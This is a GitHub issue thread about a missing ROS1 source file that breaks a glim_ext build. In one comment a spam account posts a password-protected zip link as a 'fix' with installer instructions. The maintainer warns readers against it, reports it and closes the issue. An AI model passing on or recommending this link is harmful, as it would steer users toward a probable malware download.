### ISSUE TITLE
build failed with ros1, forget to upload the gnss_global_module_ros1.cpp?

### ISSUE THREAD

**Issue by XiaoJake** [koide3/glim_ext#14]
-- GTSAM include directory:  /usr/local/lib/cmake/GTSAM/../../../include
-- Configuring done (1.1s)
CMake Error at glim_ext/modules/mapping/gnss_global/CMakeLists.txt:26 (add_library):
  Cannot find source file:

    src/glim_ext/gnss_global_module_ros1.cpp

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by koide3** [comment]
*Do NOT download and install the zip file!*  This is very suspicious response. Another guy posted the very same link within a different context. I'm reporting it to github.

https://github.com/koide3/glim_ros2/issues/33#issuecomment-2309456864

**Comment by koide3** [comment]
@XiaoJake 
Sorry, ROS1 support of the GNSS global optimization module has been stopped. But, I believe you can easily adapt the ros2 implementation into ROS1 with minor modifications.  
I'm closing this issue to isolate the spam message, but if you have any questions, please feel free to open a new issue.
